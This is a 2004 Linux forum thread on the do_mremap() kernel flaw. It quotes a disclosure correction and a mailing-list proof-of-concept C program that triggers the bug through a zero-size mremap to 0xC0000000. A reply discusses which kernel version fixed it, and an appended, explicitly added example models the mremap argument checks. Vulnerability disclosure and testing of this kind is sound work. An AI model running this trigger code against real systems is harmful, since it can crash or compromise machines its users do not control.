Critical Kernel vulnerability

Protecting your Linux box

Post by zaeemarshad » Wed Jan 07, 2004 12:12 am

take a look at this

http://www.infoworld.com/article/04/01/ ... ole_1.html

That's strange. Two flaws in the kernel!!! I thought they changed the VM in 2.6 series???

Regards
Zaeem

Re: Critical Kernel vulnerability

Post by LinuxFreaK » Wed Jan 07, 2004 2:15 am

Dear Zaeemarshad,
Salam,

zaeemarshad wrote:
take a look at this
http://www.infoworld.com/article/04/01/ ... ole_1.html
That's strange. Two flaws in the kernel!!! I thought they changed the VM in 2.6 series???


Date: Tue, 6 Jan 2004 17:30:35 +0100 (CET)
From: "Paul Starzetz" <ihaquer@isec.pl>
To: vulnwatch@vulnwatch.org, full-disclosure@lists.netsys.com, bugtraq@securityfocus.com
Subject: Linux mremap bug correction

Hi,

our initial posting contains a mistake about the vulnerability of the 2.2
kernel series. Since the 2.2 kernel series doesn't support the
MREMAP_FIXED flag it is NOT vulnerable. The source states
"MREMAP_FIXED option added 5-Dec-1999" but it didn't make it into recent
2.2.x. We apologize for the inconvenience.

--
Paul Starzetz
iSEC Security Research
http://isec.pl/

Date: Mon, 5 Jan 2004 22:22:39 +0100
From: "Christophe Devine" <devine@iie.cnam.fr>
To: full-disclosure@lists.netsys.com, bugtraq@securityfocus.com
Subject: Linux kernel do_mremap() proof-of-concept exploit code

The following program can be used to test if an x86 Linux system
is vulnerable to the do_mremap() exploit; use at your own risk.


$ cat mremap_poc.c

/*
 *  Proof-of-concept exploit code for do_mremap()
 *
 *  Copyright (C) 2004  Christophe Devine and Julien Tinnes
 *
 *  This program is free software; you can redistribute it and/or modify
 *  it under the terms of the GNU General Public License as published by
 *  the Free Software Foundation; either version 2 of the License, or
 *  (at your option) any later version.
 *
 *  This program is distributed in the hope that it will be useful,
 *  but WITHOUT ANY WARRANTY; without even the implied warranty of
 *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *  GNU General Public License for more details.
 *
 *  You should have received a copy of the GNU General Public License
 *  along with this program; if not, write to the Free Software
 *  Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307  USA
 */

#include <asm/unistd.h>
#include <sys/mman.h>
#include <unistd.h>
#include <errno.h>

#define MREMAP_MAYMOVE  1
#define MREMAP_FIXED    2

#define __NR_real_mremap __NR_mremap

static inline _syscall5( void *, real_mremap, void *, old_address,
                         size_t, old_size, size_t, new_size,
                         unsigned long, flags, void *, new_address );

int main( void )
{
    void *base;

    base = mmap( NULL, 8192, PROT_READ | PROT_WRITE,
                 MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 );

    real_mremap( base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED,
                 (void *) 0xC0000000 );

    fork();

    return( 0 );
}


It is, but not in 2.6.1-rc1.

From http://isec.pl/vulnerabilities/isec-0013-mremap.txt:

And from http://kernel.org/pub/linux/kernel/v2.6 ... -2.6.1-rc2:

Don't allow mremap of zero-sized areas.

The do_mremap() vulnerability is fixed in the 2.6 kernel only in 2.6.1-rc2, whereas you tested on 2.6.1-rc1. The latest version of the 2.2 kernel is 2.2.25, but there was no immediate changelog available. However, it was created on January 3 so I suspect it would have the patch?

Best Regards.
Farrukh Ahmed
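
An added example, not part of the posts above and not kernel source: a simplified userland model of mremap argument validation, showing why the changelog entry "Don't allow mremap of zero-sized areas" rejects the arguments used by the test program quoted in this thread. The helper name mremap_validate, the bounds and overlap checks, and the 0xC0000000 task-size constant (32-bit x86) are assumptions made for illustration.

```c
/* Added example: simplified userland model, not kernel source. */
#include <errno.h>
#include <stdio.h>

#define PAGE_SZ        4096UL
#define TASK_SZ        0xC0000000UL /* assumed: 3G/1G split on 32-bit x86 */
#define MREMAP_MAYMOVE 1UL
#define MREMAP_FIXED   2UL

static unsigned long page_align(unsigned long len)
{
    return (len + PAGE_SZ - 1) & ~(PAGE_SZ - 1);
}

/* Hypothetical helper: 0 if the arguments pass validation, -EINVAL if not.
 * zero_len_fix = 1 adds the "no zero-sized areas" check from the changelog. */
int mremap_validate(unsigned long addr, unsigned long old_len,
                    unsigned long new_len, unsigned long flags,
                    unsigned long new_addr, int zero_len_fix)
{
    if ((flags & ~(MREMAP_MAYMOVE | MREMAP_FIXED)) || (addr & (PAGE_SZ - 1)))
        return -EINVAL;
    old_len = page_align(old_len);
    new_len = page_align(new_len);
    if (zero_len_fix && new_len == 0)
        return -EINVAL;
    if (flags & MREMAP_FIXED) {
        if ((new_addr & (PAGE_SZ - 1)) || !(flags & MREMAP_MAYMOVE))
            return -EINVAL;
        /* With new_len == 0 this bound still accepts new_addr == TASK_SZ. */
        if (new_len > TASK_SZ || new_addr > TASK_SZ - new_len)
            return -EINVAL;
        /* Source and destination ranges must not overlap. */
        if (new_addr <= addr && new_addr + new_len > addr)
            return -EINVAL;
        if (addr <= new_addr && addr + old_len > new_addr)
            return -EINVAL;
    }
    return 0;
}

int main(void)
{
    unsigned long base = 0x40000000UL; /* constructed mapping address */
    unsigned long both = MREMAP_MAYMOVE | MREMAP_FIXED;
    printf("zero-size request, no check:   %d\n",
           mremap_validate(base, 0, 0, both, TASK_SZ, 0));
    printf("zero-size request, with check: %d\n",
           mremap_validate(base, 0, 0, both, TASK_SZ, 1));
    return 0;
}
```

In this model, dropping MREMAP_FIXED from the accepted flags removes the fixed-destination path entirely, which matches the correction's point that a kernel without that flag is not affected.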